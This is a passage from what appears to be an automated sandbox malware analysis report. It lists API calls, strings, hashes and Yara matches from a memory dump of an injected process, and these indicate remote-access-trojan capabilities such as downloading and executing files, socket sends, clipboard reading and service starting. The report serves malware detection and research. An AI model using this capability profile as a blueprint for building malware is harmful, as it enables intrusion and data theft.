                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                            • FindClose.KERNEL32(00000000), ref: 004093FC
                                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                              • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                            • FindClose.KERNEL32(00000000), ref: 004095F4
                                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                            • String ID:
                                            • API String ID: 1824512719-0
                                            • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                            • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                            • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                            • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: FSE$FSE$PkGNG
                                            • API String ID: 0-1266307253
                                            • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                            • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                            • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                            • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                            • String ID:
                                            • API String ID: 276877138-0
                                            • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                            • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                            • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                            • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                            APIs
                                              • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                              • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                              • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                            • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                            • ExitProcess.KERNEL32 ref: 0040F905
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                            • String ID: 5.1.3 Pro$override$pth_unenc
                                            • API String ID: 2281282204-1392497409
                                            • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                            • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                            • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                            • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                            • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: ACP$OCP
                                            • API String ID: 2299586839-711371036
                                            • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                            • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                            • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                            • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                            APIs
                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                            • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                            • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                            • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID: SETTINGS
                                            • API String ID: 3473537107-594951305
                                            • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                            • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                            • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                            • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004096A5
                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstH_prologNext
                                            • String ID:
                                            • API String ID: 1157919129-0
                                            • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                            • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                            • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                            • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040884C
                                            • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                            • String ID:
                                            • API String ID: 1771804793-0
                                            • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                            • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                            • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                            • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DownloadExecuteFileShell
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                            • API String ID: 2825088817-2881483049
                                            • Opcode ID: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                            • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                            • Opcode Fuzzy Hash: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                            • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileFind$FirstNextsend
                                            • String ID: XPG$XPG
                                            • API String ID: 4113138495-1962359302
                                            • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                            • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                            • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                            • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                            APIs
                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                              • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                              • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                              • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateInfoParametersSystemValue
                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                            • API String ID: 4127273184-3576401099
                                            • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                            • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                            • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                            • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                            • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                            • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                            • String ID:
                                            • API String ID: 4212172061-0
                                            • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                            • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                            • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                            • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID: p'E$JD
                                            • API String ID: 1084509184-908320845
                                            • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                            • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                            • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                            • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                            • String ID:
                                            • API String ID: 2829624132-0
                                            • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                            • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                            • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                            • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                            APIs
                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Context$AcquireRandomRelease
                                            • String ID:
                                            • API String ID: 1815803762-0
                                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                            • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                            • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                            APIs
                                            • OpenClipboard.USER32(00000000), ref: 0040B74C
                                            • GetClipboardData.USER32(0000000D), ref: 0040B758
                                            • CloseClipboard.USER32 ref: 0040B760
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Clipboard$CloseDataOpen
                                            • String ID:
                                            • API String ID: 2058664381-0
                                            • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                            • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                            • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                            • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                            • String ID: JD
                                            • API String ID: 1084509184-2669065882
                                            • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                            • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                            • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                            • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID: GetLocaleInfoEx
                                            • API String ID: 2299586839-2904428671
                                            • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                            • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                            • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                            • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                            • String ID:
                                            • API String ID: 1663032902-0
                                            • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                            • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                            • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                            • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$InfoLocale_abort_free
                                            • String ID:
                                            • API String ID: 2692324296-0
                                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                            • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                            • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                            APIs
                                            • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                            • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                            • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                            • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                            APIs
                                              • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                            • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                            • String ID:
                                            • API String ID: 1272433827-0
                                            • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                            • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                            • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                            • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                            APIs
